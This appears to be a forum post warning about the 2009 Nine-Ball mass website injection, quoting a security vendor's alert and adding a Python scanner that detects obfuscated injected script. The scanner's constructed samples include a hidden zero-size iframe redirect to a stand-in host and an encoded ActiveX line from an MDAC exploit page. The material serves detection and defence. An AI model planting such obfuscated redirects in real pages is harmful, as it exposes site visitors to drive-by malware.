Nine-Ball Mass Injection attack compromises 40,000 Websites
Please be careful when browsing: ongoing attacks continue to compromise legitimate sites that have not been locked down well from a security standpoint, so even trusted sites can serve malicious code.
http://www.eweek.com/c/a/Security/40000-Web-Sites-Compromised-in-Mass-Attack-227486/
http://securitylabs.websense.com/content/Alerts/3421.aspx
http://vil.nai.com/vil/content/v_141590.htm
QUOTE: Websense Security Labs has detected another large mass injection attack in the wild after the Beladen and Gumblar attacks. We are calling this mass compromise Nine-Ball because of the final landing site. We have been tracking the Nine-Ball mass compromise since 6/03/2009. To date, over 40,000 legitimate Web sites have been compromised with obfuscated code that leads to a multi-level redirection attack, ending in a series of drive-by exploits that if successful install a trojan downloader on the user's machine.
After redirection, the exploit payload site returns highly obfuscated malicious code. The malicious code attempts to exploit MS06-014 (targeting MDAC) and CVE-2006-5820 (targeting AOL SuperBuddy), as well as employing exploits targeting Acrobat Reader and QuickTime. The MS06-014 exploit code will download a Trojan dropper with low AV detection rate. This dropper drops a dll with the name SOCKET2.DLL to Windows' system folder. This file is used to steal user information. The malicious PDF file, served by the exploit site, also has very low AV detection rate.
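The quoted alert describes the first stage of the attack: obfuscated code injected into legitimate pages that decodes to a redirect, which leads in turn to an exploit page that tries MS06-014 (the MDAC RDS.DataSpace control) among others. Below is an added example, not Websense's or the article's code, of the kind of source check a site owner could run over their own pages to catch such an injection: it flags common obfuscation idioms, peels back the unescape()/String.fromCharCode layers to expose the redirect target, and looks for the RDS.DataSpace indicator on decoded script. The sample pages, the hostname example.invalid, and the indicator list are constructed for this example; the heuristics are general and will not catch every injection variant.

```python
import re
from urllib.parse import unquote

# Obfuscation and redirect idioms common in injected code (heuristics, not a signature set).
# RDS.DataSpace (CLSID BD96C556-...) is the MDAC ActiveX control abused by MS06-014 exploits.
INDICATORS = [
    ("eval_unescape", re.compile(r"eval\s*\(\s*unescape\s*\(", re.I)),
    ("write_unescape", re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.I)),
    ("charcode_chain", re.compile(r"String\.fromCharCode\s*\(\s*(?:\d+\s*,\s*){8,}\d+\s*\)", re.I)),
    ("hidden_iframe", re.compile(r"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?0\b", re.I)),
    ("rds_dataspace", re.compile(r"RDS\.DataSpace|BD96C556-65A3-11D0-983A-00C04FC29E36", re.I)),
]
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
PERCENT_RUN_RE = re.compile(r"(?:%[0-9a-fA-F]{2}){16,}")       # long %XX runs hide markup
CHARCODE_RE = re.compile(r"String\.fromCharCode\s*\(([\d,\s]+)\)")
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)


def decode_layers(code, max_layers=5):
    """Repeatedly decode %XX runs and String.fromCharCode(...) lists so that
    nested obfuscation layers collapse to the plain text they hide."""
    for _ in range(max_layers):
        decoded = PERCENT_RUN_RE.sub(lambda m: unquote(m.group(0)), code)
        decoded = CHARCODE_RE.sub(
            # JS fromCharCode takes UTF-16 code units, hence the modulo
            lambda m: "".join(chr(int(n) % 0x10000) for n in m.group(1).split(",") if n.strip()),
            decoded)
        if decoded == code:
            break
        code = decoded
    return code


def scan_html(html):
    """Return the indicator names that fired on the raw page or on any decoded
    script block, plus URLs recovered from decoded script (likely redirect targets)."""
    findings = {name for name, rx in INDICATORS if rx.search(html)}
    urls = set()
    for m in SCRIPT_RE.finditer(html):
        raw = m.group(1)
        decoded = decode_layers(raw)
        if decoded != raw:
            findings.add("obfuscated_script")
            findings.update(name for name, rx in INDICATORS if rx.search(decoded))
            urls.update(URL_RE.findall(decoded))
    return {"findings": sorted(findings), "urls": sorted(urls)}


# --- Constructed sample data for the example (not captured from a real site) ---
def _escape_all(s):
    """Encode every character as %XX, the way injected code often hides markup."""
    return "".join("%%%02X" % ord(c) for c in s)


def _charcodes(s):
    return ",".join(str(ord(c)) for c in s)


CLEAN_PAGE = "<html><body><h1>Welcome</h1><script>var x = 1;</script></body></html>"
# Stage one: the injected redirect (zero-size iframe to a hypothetical exploit host).
INJECTED_IFRAME = '<iframe src="http://example.invalid/in.php" width=0 height=0></iframe>'
# Stage two: the kind of line an MS06-014 exploit page would hide behind fromCharCode.
LANDING_FRAGMENT = 'var o = new ActiveXObject("RDS.DataSpace");'
INFECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script>document.write(unescape("%s"))</script>' % _escape_all(INJECTED_IFRAME)
    + "<script>eval(String.fromCharCode(%s))</script></body>" % _charcodes(LANDING_FRAGMENT))

if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(label, scan_html(page))
```

Run over a crawl of your own site and diff the results against a known-good copy; the recovered URLs are what to block at the proxy and hunt for in web logs, and a hit on rds_dataspace on a page you host means the page is serving the exploit stage itself, not just a redirect.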